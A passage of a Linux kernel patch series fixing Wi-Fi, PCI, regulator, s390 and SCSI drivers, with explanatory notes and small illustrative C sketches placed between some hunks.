+ 	return 0;
+ }
+ 
+-static void wfx_set_mfp_ap(struct wfx_vif *wvif)
++static int wfx_set_mfp_ap(struct wfx_vif *wvif)
+ {
+ 	struct ieee80211_vif *vif = wvif_to_vif(wvif);
+ 	struct sk_buff *skb = ieee80211_beacon_get(wvif->wdev->hw, vif, 0);
+ 	const int ieoffset = offsetof(struct ieee80211_mgmt, u.beacon.variable);
+-	const u16 *ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
+-						 skb->len - ieoffset);
+ 	const int pairwise_cipher_suite_count_offset = 8 / sizeof(u16);
+ 	const int pairwise_cipher_suite_size = 4 / sizeof(u16);
+ 	const int akm_suite_size = 4 / sizeof(u16);
++	const u16 *ptr;
+ 
+-	if (ptr) {
+-		ptr += pairwise_cipher_suite_count_offset;
+-		if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-			return;
+-		ptr += 1 + pairwise_cipher_suite_size * *ptr;
+-		if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-			return;
+-		ptr += 1 + akm_suite_size * *ptr;
+-		if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
+-			return;
+-		wfx_hif_set_mfp(wvif, *ptr & BIT(7), *ptr & BIT(6));
+-	}
++	if (unlikely(!skb))
++		return -ENOMEM;
++
++	ptr = (u16 *)cfg80211_find_ie(WLAN_EID_RSN, skb->data + ieoffset,
++				      skb->len - ieoffset);
++	if (unlikely(!ptr))
++		return -EINVAL;
++
++	ptr += pairwise_cipher_suite_count_offset;
++	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
++		return -EINVAL;
++
++	ptr += 1 + pairwise_cipher_suite_size * *ptr;
++	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
++		return -EINVAL;
++
++	ptr += 1 + akm_suite_size * *ptr;
++	if (WARN_ON(ptr > (u16 *)skb_tail_pointer(skb)))
++		return -EINVAL;
++
++	wfx_hif_set_mfp(wvif, *ptr & BIT(7), *ptr & BIT(6));
++	return 0;
+ }
+ 
+ int wfx_start_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+@@ -394,8 +403,7 @@ int wfx_start_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
+ 	ret = wfx_hif_start(wvif, &vif->bss_conf, wvif->channel);
+ 	if (ret > 0)
+ 		return -EIO;
+-	wfx_set_mfp_ap(wvif);
+-	return ret;
++	return wfx_set_mfp_ap(wvif);
+ }
+ 
+ void wfx_stop_ap(struct ieee80211_hw *hw, struct ieee80211_vif *vif,
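
[Note on the wfx hunks: the rewrite converts nested ifs with silent returns into early-exit error propagation, so wfx_start_ap() can now fail when the beacon has no parseable RSN element instead of starting the AP with unknown management-frame-protection (MFPC/MFPR) settings. The underlying shape is a validate-step-validate walk over an untrusted buffer, with a bounds check before every dereference. An illustrative, generic sketch of one such step (names invented):

    #include <errno.h>
    #include <stdint.h>

    /* Skip a "count word followed by count entries" run, erroring out
     * instead of reading past the buffer end. */
    static int skip_counted_list(const uint16_t **pp, const uint16_t *end,
                                 int entry_words)
    {
            const uint16_t *p = *pp;

            if (p >= end)
                    return -EINVAL;
            p += 1 + entry_words * *p;      /* count word + entries */
            if (p >= end)
                    return -EINVAL;
            *pp = p;
            return 0;
    }
]
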
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index ed6d75d138c7a..e1d02b7c60294 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -274,7 +274,7 @@ void pci_bus_put(struct pci_bus *bus);
+ 
+ /* PCIe speed to Mb/s reduced by encoding overhead */
+ #define PCIE_SPEED2MBS_ENC(speed) \
+-	((speed) == PCIE_SPEED_64_0GT ? 64000*128/130 : \
++	((speed) == PCIE_SPEED_64_0GT ? 64000*1/1 : \
+ 	 (speed) == PCIE_SPEED_32_0GT ? 32000*128/130 : \
+ 	 (speed) == PCIE_SPEED_16_0GT ? 16000*128/130 : \
+ 	 (speed) == PCIE_SPEED_8_0GT  ?  8000*128/130 : \
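
[Note on the PCIE_SPEED2MBS_ENC hunk: the fix reflects a real protocol change. The lower entries of the macro (outside the context shown) use 8b/10b encoding for 2.5 and 5 GT/s, speeds from 8 through 32 GT/s use 128b/130b, and 64 GT/s (PCIe 6.0) moves to PAM4 signalling with 1b/1b FLIT-mode encoding, so the raw 64000 Mb/s carries no line-code overhead; writing it as 64000*1/1 keeps the macro's columns aligned. The arithmetic, as a quick standalone check:

    #include <stdio.h>

    int main(void)
    {
            /* Effective data rate in Mb/s after encoding overhead. */
            printf("2.5 GT/s (8b/10b):    %d\n",  2500 * 8 / 10);    /* 2000  */
            printf("8.0 GT/s (128b/130b): %d\n",  8000 * 128 / 130); /* 7876  */
            printf("64  GT/s (1b/1b):     %d\n", 64000 * 1 / 1);     /* 64000 */
            return 0;
    }
]
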
+diff --git a/drivers/pci/pcie/aer.c b/drivers/pci/pcie/aer.c
+index e2d8a74f83c34..5426f450ce919 100644
+--- a/drivers/pci/pcie/aer.c
++++ b/drivers/pci/pcie/aer.c
+@@ -748,7 +748,7 @@ static void aer_print_port_info(struct pci_dev *dev, struct aer_err_info *info)
+ 	u8 bus = info->id >> 8;
+ 	u8 devfn = info->id & 0xff;
+ 
+-	pci_info(dev, "%s%s error received: %04x:%02x:%02x.%d\n",
++	pci_info(dev, "%s%s error message received from %04x:%02x:%02x.%d\n",
+ 		 info->multi_error_valid ? "Multiple " : "",
+ 		 aer_error_severity_string[info->severity],
+ 		 pci_domain_nr(dev->bus), bus, PCI_SLOT(devfn),
+@@ -936,7 +936,12 @@ static bool find_source_device(struct pci_dev *parent,
+ 		pci_walk_bus(parent->subordinate, find_device_iter, e_info);
+ 
+ 	if (!e_info->error_dev_num) {
+-		pci_info(parent, "can't find device of ID%04x\n", e_info->id);
++		u8 bus = e_info->id >> 8;
++		u8 devfn = e_info->id & 0xff;
++
++		pci_info(parent, "found no error details for %04x:%02x:%02x.%d\n",
++			 pci_domain_nr(parent->bus), bus, PCI_SLOT(devfn),
++			 PCI_FUNC(devfn));
+ 		return false;
+ 	}
+ 	return true;
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 8765544bac35c..51d634fbdfb8e 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -607,10 +607,13 @@ static void quirk_amd_dwc_class(struct pci_dev *pdev)
+ {
+ 	u32 class = pdev->class;
+ 
+-	/* Use "USB Device (not host controller)" class */
+-	pdev->class = PCI_CLASS_SERIAL_USB_DEVICE;
+-	pci_info(pdev, "PCI class overridden (%#08x -> %#08x) so dwc3 driver can claim this instead of xhci\n",
+-		 class, pdev->class);
++	if (class != PCI_CLASS_SERIAL_USB_DEVICE) {
++		/* Use "USB Device (not host controller)" class */
++		pdev->class = PCI_CLASS_SERIAL_USB_DEVICE;
++		pci_info(pdev,
++			"PCI class overridden (%#08x -> %#08x) so dwc3 driver can claim this instead of xhci\n",
++			class, pdev->class);
++	}
+ }
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_AMD, PCI_DEVICE_ID_AMD_NL_USB,
+ 		quirk_amd_dwc_class);
+@@ -3691,6 +3694,19 @@ static void quirk_no_pm_reset(struct pci_dev *dev)
+ DECLARE_PCI_FIXUP_CLASS_HEADER(PCI_VENDOR_ID_ATI, PCI_ANY_ID,
+ 			       PCI_CLASS_DISPLAY_VGA, 8, quirk_no_pm_reset);
+ 
++/*
++ * Spectrum-{1,2,3,4} devices report that a D3hot->D0 transition causes a reset
++ * (i.e., they advertise NoSoftRst-). However, this transition does not have
++ * any effect on the device: It continues to be operational and network ports
++ * remain up. Advertising this support makes it seem as if a PM reset is viable
++ * for these devices. Mark it as unavailable to skip it when testing reset
++ * methods.
++ */
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcb84, quirk_no_pm_reset);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcf6c, quirk_no_pm_reset);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcf70, quirk_no_pm_reset);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_MELLANOX, 0xcf80, quirk_no_pm_reset);
++
+ /*
+  * Thunderbolt controllers with broken MSI hotplug signaling:
+  * Entire 1st generation (Light Ridge, Eagle Ridge, Light Peak) and part
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 0c1faa6c1973a..3f3320d0a4f8f 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -1308,13 +1308,6 @@ static void stdev_release(struct device *dev)
+ {
+ 	struct switchtec_dev *stdev = to_stdev(dev);
+ 
+-	if (stdev->dma_mrpc) {
+-		iowrite32(0, &stdev->mmio_mrpc->dma_en);
+-		flush_wc_buf(stdev);
+-		writeq(0, &stdev->mmio_mrpc->dma_addr);
+-		dma_free_coherent(&stdev->pdev->dev, sizeof(*stdev->dma_mrpc),
+-				stdev->dma_mrpc, stdev->dma_mrpc_dma_addr);
+-	}
+ 	kfree(stdev);
+ }
+ 
+@@ -1358,7 +1351,7 @@ static struct switchtec_dev *stdev_create(struct pci_dev *pdev)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	stdev->alive = true;
+-	stdev->pdev = pdev;
++	stdev->pdev = pci_dev_get(pdev);
+ 	INIT_LIST_HEAD(&stdev->mrpc_queue);
+ 	mutex_init(&stdev->mrpc_mutex);
+ 	stdev->mrpc_busy = 0;
+@@ -1391,6 +1384,7 @@ static struct switchtec_dev *stdev_create(struct pci_dev *pdev)
+ 	return stdev;
+ 
+ err_put:
++	pci_dev_put(stdev->pdev);
+ 	put_device(&stdev->dev);
+ 	return ERR_PTR(rc);
+ }
+@@ -1646,6 +1640,18 @@ static int switchtec_init_pci(struct switchtec_dev *stdev,
+ 	return 0;
+ }
+ 
++static void switchtec_exit_pci(struct switchtec_dev *stdev)
++{
++	if (stdev->dma_mrpc) {
++		iowrite32(0, &stdev->mmio_mrpc->dma_en);
++		flush_wc_buf(stdev);
++		writeq(0, &stdev->mmio_mrpc->dma_addr);
++		dma_free_coherent(&stdev->pdev->dev, sizeof(*stdev->dma_mrpc),
++				  stdev->dma_mrpc, stdev->dma_mrpc_dma_addr);
++		stdev->dma_mrpc = NULL;
++	}
++}
++
+ static int switchtec_pci_probe(struct pci_dev *pdev,
+ 			       const struct pci_device_id *id)
+ {
+@@ -1705,6 +1711,9 @@ static void switchtec_pci_remove(struct pci_dev *pdev)
+ 	ida_free(&switchtec_minor_ida, MINOR(stdev->dev.devt));
+ 	dev_info(&stdev->dev, "unregistered.\n");
+ 	stdev_kill(stdev);
++	switchtec_exit_pci(stdev);
++	pci_dev_put(stdev->pdev);
++	stdev->pdev = NULL;
+ 	put_device(&stdev->dev);
+ }
+ 
+diff --git a/drivers/pnp/pnpacpi/rsparser.c b/drivers/pnp/pnpacpi/rsparser.c
+index 4f05f610391b0..c02ce0834c2cd 100644
+--- a/drivers/pnp/pnpacpi/rsparser.c
++++ b/drivers/pnp/pnpacpi/rsparser.c
+@@ -151,13 +151,13 @@ static int vendor_resource_matches(struct pnp_dev *dev,
+ static void pnpacpi_parse_allocated_vendor(struct pnp_dev *dev,
+ 				    struct acpi_resource_vendor_typed *vendor)
+ {
+-	if (vendor_resource_matches(dev, vendor, &hp_ccsr_uuid, 16)) {
+-		u64 start, length;
++	struct { u64 start, length; } range;
+ 
+-		memcpy(&start, vendor->byte_data, sizeof(start));
+-		memcpy(&length, vendor->byte_data + 8, sizeof(length));
+-
+-		pnp_add_mem_resource(dev, start, start + length - 1, 0);
++	if (vendor_resource_matches(dev, vendor, &hp_ccsr_uuid,
++				    sizeof(range))) {
++		memcpy(&range, vendor->byte_data, sizeof(range));
++		pnp_add_mem_resource(dev, range.start, range.start +
++				     range.length - 1, 0);
+ 	}
+ }
+ 
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 34d3d82819064..c8702011b7613 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -2925,7 +2925,8 @@ static int _regulator_enable(struct regulator *regulator)
+ 		/* Fallthrough on positive return values - already enabled */
+ 	}
+ 
+-	rdev->use_count++;
++	if (regulator->enable_count == 1)
++		rdev->use_count++;
+ 
+ 	return 0;
+ 
+@@ -3000,37 +3001,40 @@ static int _regulator_disable(struct regulator *regulator)
+ 
+ 	lockdep_assert_held_once(&rdev->mutex.base);
+ 
+-	if (WARN(rdev->use_count <= 0,
++	if (WARN(regulator->enable_count == 0,
+ 		 "unbalanced disables for %s\n", rdev_get_name(rdev)))
+ 		return -EIO;
+ 
+-	/* are we the last user and permitted to disable ? */
+-	if (rdev->use_count == 1 &&
+-	    (rdev->constraints && !rdev->constraints->always_on)) {
+-
+-		/* we are last user */
+-		if (regulator_ops_is_valid(rdev, REGULATOR_CHANGE_STATUS)) {
+-			ret = _notifier_call_chain(rdev,
+-						   REGULATOR_EVENT_PRE_DISABLE,
+-						   NULL);
+-			if (ret & NOTIFY_STOP_MASK)
+-				return -EINVAL;
+-
+-			ret = _regulator_do_disable(rdev);
+-			if (ret < 0) {
+-				rdev_err(rdev, "failed to disable: %pe\n", ERR_PTR(ret));
+-				_notifier_call_chain(rdev,
+-						REGULATOR_EVENT_ABORT_DISABLE,
++	if (regulator->enable_count == 1) {
++	/* disabling last enable_count from this regulator */
++		/* are we the last user and permitted to disable ? */
++		if (rdev->use_count == 1 &&
++		    (rdev->constraints && !rdev->constraints->always_on)) {
++
++			/* we are last user */
++			if (regulator_ops_is_valid(rdev, REGULATOR_CHANGE_STATUS)) {
++				ret = _notifier_call_chain(rdev,
++							   REGULATOR_EVENT_PRE_DISABLE,
++							   NULL);
++				if (ret & NOTIFY_STOP_MASK)
++					return -EINVAL;
++
++				ret = _regulator_do_disable(rdev);
++				if (ret < 0) {
++					rdev_err(rdev, "failed to disable: %pe\n", ERR_PTR(ret));
++					_notifier_call_chain(rdev,
++							REGULATOR_EVENT_ABORT_DISABLE,
++							NULL);
++					return ret;
++				}
++				_notifier_call_chain(rdev, REGULATOR_EVENT_DISABLE,
+ 						NULL);
+-				return ret;
+ 			}
+-			_notifier_call_chain(rdev, REGULATOR_EVENT_DISABLE,
+-					NULL);
+-		}
+ 
+-		rdev->use_count = 0;
+-	} else if (rdev->use_count > 1) {
+-		rdev->use_count--;
++			rdev->use_count = 0;
++		} else if (rdev->use_count > 1) {
++			rdev->use_count--;
++		}
+ 	}
+ 
+ 	if (ret == 0)
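
[Note on the regulator hunks: the fix is about double counting. Each consumer handle keeps its own enable_count, and the device-wide use_count should move only on a consumer's 0->1 and 1->0 transitions, not on every nested enable/disable from the same consumer. A small standalone model of the two-level counting:

    #include <assert.h>

    struct rdev     { int use_count; };
    struct consumer { struct rdev *rdev; int enable_count; };

    static void consumer_enable(struct consumer *c)
    {
            if (++c->enable_count == 1)     /* first enable from this consumer */
                    c->rdev->use_count++;
    }

    static int consumer_disable(struct consumer *c)
    {
            if (c->enable_count == 0)
                    return -1;              /* unbalanced disable */
            if (--c->enable_count == 0)     /* last disable from this consumer */
                    c->rdev->use_count--;
            return 0;
    }

    int main(void)
    {
            struct rdev r = { 0 };
            struct consumer a = { &r, 0 }, b = { &r, 0 };

            consumer_enable(&a); consumer_enable(&a); consumer_enable(&b);
            assert(r.use_count == 2);   /* two consumers, not three enables */
            consumer_disable(&a); consumer_disable(&a); consumer_disable(&b);
            assert(r.use_count == 0);
            return 0;
    }
]
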
+diff --git a/drivers/regulator/ti-abb-regulator.c b/drivers/regulator/ti-abb-regulator.c
+index 115345e9fdedc..82af27b0e4698 100644
+--- a/drivers/regulator/ti-abb-regulator.c
++++ b/drivers/regulator/ti-abb-regulator.c
+@@ -734,9 +734,25 @@ static int ti_abb_probe(struct platform_device *pdev)
+ 			return PTR_ERR(abb->setup_reg);
+ 	}
+ 
+-	abb->int_base = devm_platform_ioremap_resource_byname(pdev, "int-address");
+-	if (IS_ERR(abb->int_base))
+-		return PTR_ERR(abb->int_base);
++	pname = "int-address";
++	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, pname);
++	if (!res) {
++		dev_err(dev, "Missing '%s' IO resource\n", pname);
++		return -ENODEV;
++	}
++	/*
++	 * The MPU interrupt status register (PRM_IRQSTATUS_MPU) is
++	 * shared between regulator-abb-{ivahd,dspeve,gpu} driver
++	 * instances. Therefore use devm_ioremap() rather than
++	 * devm_platform_ioremap_resource_byname() to avoid busy
++	 * resource region conflicts.
++	 */
++	abb->int_base = devm_ioremap(dev, res->start,
++					     resource_size(res));
++	if (!abb->int_base) {
++		dev_err(dev, "Unable to map '%s'\n", pname);
++		return -ENOMEM;
++	}
+ 
+ 	/* Map Optional resources */
+ 	pname = "efuse-address";
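
[Note on the ti-abb hunk: this trades convenience for correctness. devm_platform_ioremap_resource_byname() requests the memory region internally, which fails as soon as a second regulator-abb instance asks for the same shared PRM_IRQSTATUS_MPU word, so the register is now mapped with plain devm_ioremap(), which does not claim the region. The open-coded lookup-and-map, with error messages trimmed:

    /* Map a named MEM resource without reserving it, so sibling
     * instances can map the same shared register region. */
    res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "int-address");
    if (!res)
            return -ENODEV;

    base = devm_ioremap(&pdev->dev, res->start, resource_size(res));
    if (!base)
            return -ENOMEM;
]
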
+diff --git a/drivers/s390/crypto/vfio_ap_ops.c b/drivers/s390/crypto/vfio_ap_ops.c
+index 0659aa2863ab0..86a8bd5324899 100644
+--- a/drivers/s390/crypto/vfio_ap_ops.c
++++ b/drivers/s390/crypto/vfio_ap_ops.c
+@@ -1742,6 +1742,7 @@ static ssize_t status_show(struct device *dev,
+ {
+ 	ssize_t nchars = 0;
+ 	struct vfio_ap_queue *q;
++	unsigned long apid, apqi;
+ 	struct ap_matrix_mdev *matrix_mdev;
+ 	struct ap_device *apdev = to_ap_dev(dev);
+ 
+@@ -1749,8 +1750,21 @@ static ssize_t status_show(struct device *dev,
+ 	q = dev_get_drvdata(&apdev->device);
+ 	matrix_mdev = vfio_ap_mdev_for_queue(q);
+ 
++	/* If the queue is assigned to the matrix mediated device, then
++	 * determine whether it is passed through to a guest; otherwise,
++	 * indicate that it is unassigned.
++	 */
+ 	if (matrix_mdev) {
+-		if (matrix_mdev->kvm)
++		apid = AP_QID_CARD(q->apqn);
++		apqi = AP_QID_QUEUE(q->apqn);
++		/*
++		 * If the queue is passed through to the guest, then indicate
++		 * that it is in use; otherwise, indicate that it is
++		 * merely assigned to a matrix mediated device.
++		 */
++		if (matrix_mdev->kvm &&
++		    test_bit_inv(apid, matrix_mdev->shadow_apcb.apm) &&
++		    test_bit_inv(apqi, matrix_mdev->shadow_apcb.aqm))
+ 			nchars = scnprintf(buf, PAGE_SIZE, "%s\n",
+ 					   AP_QUEUE_IN_USE);
+ 		else
+diff --git a/drivers/scsi/arcmsr/arcmsr.h b/drivers/scsi/arcmsr/arcmsr.h
+index 07df255c4b1bd..b513d4d9c35a0 100644
+--- a/drivers/scsi/arcmsr/arcmsr.h
++++ b/drivers/scsi/arcmsr/arcmsr.h
+@@ -77,9 +77,13 @@ struct device_attribute;
+ #ifndef PCI_DEVICE_ID_ARECA_1203
+ #define PCI_DEVICE_ID_ARECA_1203	0x1203
+ #endif
++#ifndef PCI_DEVICE_ID_ARECA_1883
++#define PCI_DEVICE_ID_ARECA_1883	0x1883
++#endif
+ #ifndef PCI_DEVICE_ID_ARECA_1884
+ #define PCI_DEVICE_ID_ARECA_1884	0x1884
+ #endif
++#define PCI_DEVICE_ID_ARECA_1886_0	0x1886
+ #define PCI_DEVICE_ID_ARECA_1886	0x188A
+ #define	ARCMSR_HOURS			(1000 * 60 * 60 * 4)
+ #define	ARCMSR_MINUTES			(1000 * 60 * 60)
+diff --git a/drivers/scsi/arcmsr/arcmsr_hba.c b/drivers/scsi/arcmsr/arcmsr_hba.c
+index d3fb8a9c1c392..fc9d4005830b0 100644
+--- a/drivers/scsi/arcmsr/arcmsr_hba.c
++++ b/drivers/scsi/arcmsr/arcmsr_hba.c
+@@ -214,8 +214,12 @@ static struct pci_device_id arcmsr_device_id_table[] = {
+ 		.driver_data = ACB_ADAPTER_TYPE_A},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1880),
+ 		.driver_data = ACB_ADAPTER_TYPE_C},
++	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1883),
++		.driver_data = ACB_ADAPTER_TYPE_C},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1884),
+ 		.driver_data = ACB_ADAPTER_TYPE_E},
++	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1886_0),
++		.driver_data = ACB_ADAPTER_TYPE_F},
+ 	{PCI_DEVICE(PCI_VENDOR_ID_ARECA, PCI_DEVICE_ID_ARECA_1886),
+ 		.driver_data = ACB_ADAPTER_TYPE_F},
+ 	{0, 0}, /* Terminating entry */
+@@ -4708,9 +4712,11 @@ static const char *arcmsr_info(struct Scsi_Host *host)
+ 	case PCI_DEVICE_ID_ARECA_1680:
+ 	case PCI_DEVICE_ID_ARECA_1681:
+ 	case PCI_DEVICE_ID_ARECA_1880:
++	case PCI_DEVICE_ID_ARECA_1883:
+ 	case PCI_DEVICE_ID_ARECA_1884:
+ 		type = "SAS/SATA";
+ 		break;
++	case PCI_DEVICE_ID_ARECA_1886_0:
+ 	case PCI_DEVICE_ID_ARECA_1886:
+ 		type = "NVMe/SAS/SATA";
+ 		break;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index 0c80ff9affa39..7ae56a2fe2325 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -1565,6 +1565,11 @@ static irqreturn_t phy_up_v3_hw(int phy_no, struct hisi_hba *hisi_hba)
+ 	}
+ 
+ 	phy->port_id = port_id;
++	spin_lock(&phy->lock);
++	/* Delete timer and set phy_attached atomically */
++	del_timer(&phy->timer);
++	phy->phy_attached = 1;
++	spin_unlock(&phy->lock);
+ 
+ 	/*
+ 	 * Call pm_runtime_get_noresume() which pairs with
+@@ -1578,11 +1583,6 @@ static irqreturn_t phy_up_v3_hw(int phy_no, struct hisi_hba *hisi_hba)
+ 
+ 	res = IRQ_HANDLED;
+ 
+-	spin_lock(&phy->lock);
+-	/* Delete timer and set phy_attached atomically */
+-	del_timer(&phy->timer);
+-	phy->phy_attached = 1;
+-	spin_unlock(&phy->lock);
+ end:
+ 	if (phy->reset_completion)
+ 		complete(phy->reset_completion);
+diff --git a/drivers/scsi/isci/request.c b/drivers/scsi/isci/request.c
+index 6370cdbfba08c..0f0732d56800d 100644
+--- a/drivers/scsi/isci/request.c
++++ b/drivers/scsi/isci/request.c
+@@ -3390,7 +3390,7 @@ static enum sci_status isci_io_request_build(struct isci_host *ihost,
+ 		return SCI_FAILURE;
+ 	}
+ 
+-	return SCI_SUCCESS;
++	return status;
+ }
+ 
+ static struct isci_request *isci_request_from_tag(struct isci_host *ihost, u16 tag)
+diff --git a/drivers/scsi/libfc/fc_fcp.c b/drivers/scsi/libfc/fc_fcp.c
+index 945adca5e72fd..05be0810b5e31 100644
+--- a/drivers/scsi/libfc/fc_fcp.c
++++ b/drivers/scsi/libfc/fc_fcp.c
+@@ -265,6 +265,11 @@ static int fc_fcp_send_abort(struct fc_fcp_pkt *fsp)
+ 	if (!fsp->seq_ptr)
+ 		return -EINVAL;
+ 
++	if (fsp->state & FC_SRB_ABORT_PENDING) {
++		FC_FCP_DBG(fsp, "abort already pending\n");
++		return -EBUSY;
++	}
++
+ 	this_cpu_inc(fsp->lp->stats->FcpPktAborts);
+ 
+ 	fsp->state |= FC_SRB_ABORT_PENDING;
+@@ -1671,7 +1676,7 @@ static void fc_fcp_rec_error(struct fc_fcp_pkt *fsp, struct fc_frame *fp)
+ 		if (fsp->recov_retry++ < FC_MAX_RECOV_RETRY)
+ 			fc_fcp_rec(fsp);
+ 		else
+-			fc_fcp_recovery(fsp, FC_ERROR);
++			fc_fcp_recovery(fsp, FC_TIMED_OUT);
+ 		break;
+ 	}
+ 	fc_fcp_unlock_pkt(fsp);
+@@ -1690,11 +1695,12 @@ static void fc_fcp_recovery(struct fc_fcp_pkt *fsp, u8 code)
+ 	fsp->status_code = code;
+ 	fsp->cdb_status = 0;
+ 	fsp->io_status = 0;
+-	/*
+-	 * if this fails then we let the scsi command timer fire and
+-	 * scsi-ml escalate.
+-	 */
+-	fc_fcp_send_abort(fsp);
++	if (!fsp->cmd)
++		/*
++		 * Only abort non-scsi commands; otherwise let the
++		 * scsi command timer fire and scsi-ml escalate.
++		 */
++		fc_fcp_send_abort(fsp);
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc.h b/drivers/scsi/lpfc/lpfc.h
+index 664ac3069c4be..dc5ac3cc70f6d 100644
+--- a/drivers/scsi/lpfc/lpfc.h
++++ b/drivers/scsi/lpfc/lpfc.h
+@@ -33,6 +33,7 @@
+ struct lpfc_sli2_slim;
+ 
+ #define ELX_MODEL_NAME_SIZE	80
++#define ELX_FW_NAME_SIZE	84
+ 
+ #define LPFC_PCI_DEV_LP		0x1
+ #define LPFC_PCI_DEV_OC		0x2
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index f59de61803dc8..1a0bafde34d86 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -14778,7 +14778,7 @@ out:
+ int
+ lpfc_sli4_request_firmware_update(struct lpfc_hba *phba, uint8_t fw_upgrade)
+ {
+-	uint8_t file_name[ELX_MODEL_NAME_SIZE];
++	char file_name[ELX_FW_NAME_SIZE] = {0};
+ 	int ret;
+ 	const struct firmware *fw;
+ 
+@@ -14787,7 +14787,7 @@ lpfc_sli4_request_firmware_update(struct lpfc_hba *phba, uint8_t fw_upgrade)
+ 	    LPFC_SLI_INTF_IF_TYPE_2)
+ 		return -EPERM;
+ 
+-	snprintf(file_name, ELX_MODEL_NAME_SIZE, "%s.grp", phba->ModelName);
++	scnprintf(file_name, sizeof(file_name), "%s.grp", phba->ModelName);
+ 
+ 	if (fw_upgrade == INT_FW_UPGRADE) {
+ 		ret = request_firmware_nowait(THIS_MODULE, FW_ACTION_UEVENT,
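
[Note on the lpfc hunks: the bug is truncation, not overflow. The firmware file name is the model name plus the four bytes of ".grp", so a buffer sized for the model alone (80) can silently lose the suffix under snprintf(); the new ELX_FW_NAME_SIZE of 84 leaves room for it, and scnprintf() returns the bytes actually written rather than the bytes that would have been. The sizing rule in miniature, with a made-up model string:

    #include <stdio.h>

    #define MODEL_NAME_SIZE 80
    #define FW_NAME_SIZE    (MODEL_NAME_SIZE + 4)   /* ".grp" reuses the NUL slot */

    int main(void)
    {
            char model[MODEL_NAME_SIZE] = "LPe36000-XYZ";
            char fw_name[FW_NAME_SIZE] = { 0 };

            /* With FW_NAME_SIZE == MODEL_NAME_SIZE, a maximal model name
             * would truncate ".grp" and the firmware request would miss. */
            snprintf(fw_name, sizeof(fw_name), "%s.grp", model);
            printf("%s\n", fw_name);
            return 0;
    }
]
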
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index d2c7de804b998..41636c4c43af0 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1886,7 +1886,8 @@ static int mpi3mr_create_op_reply_q(struct mpi3mr_ioc *mrioc, u16 qidx)
+ 
+ 	reply_qid = qidx + 1;
+ 	op_reply_q->num_replies = MPI3MR_OP_REP_Q_QD;
+-	if (!mrioc->pdev->revision)
++	if ((mrioc->pdev->device == MPI3_MFGPAGE_DEVID_SAS4116) &&
++		!mrioc->pdev->revision)
+ 		op_reply_q->num_replies = MPI3MR_OP_REP_Q_QD4K;
+ 	op_reply_q->ci = 0;
+ 	op_reply_q->ephase = 1;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_os.c b/drivers/scsi/mpi3mr/mpi3mr_os.c
+index 85f5b349c7e43..7a6b006e70c88 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_os.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_os.c
+@@ -4963,7 +4963,10 @@ mpi3mr_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		mpi3mr_init_drv_cmd(&mrioc->evtack_cmds[i],
+ 				    MPI3MR_HOSTTAG_EVTACKCMD_MIN + i);
+ 
+-	if (pdev->revision)
++	if ((pdev->device == MPI3_MFGPAGE_DEVID_SAS4116) &&
++		!pdev->revision)
++		mrioc->enable_segqueue = false;
++	else
+ 		mrioc->enable_segqueue = true;
+ 
+ 	init_waitqueue_head(&mrioc->reset_waitq);
+diff --git a/drivers/scsi/scsi_error.c b/drivers/scsi/scsi_error.c
+index 9a289d6f2e5ee..66290961c47c2 100644
+--- a/drivers/scsi/scsi_error.c
++++ b/drivers/scsi/scsi_error.c
+@@ -61,11 +61,11 @@ static int scsi_eh_try_stu(struct scsi_cmnd *scmd);
+ static enum scsi_disposition scsi_try_to_abort_cmd(struct scsi_host_template *,
+ 						   struct scsi_cmnd *);
+ 
+-void scsi_eh_wakeup(struct Scsi_Host *shost)
++void scsi_eh_wakeup(struct Scsi_Host *shost, unsigned int busy)
+ {
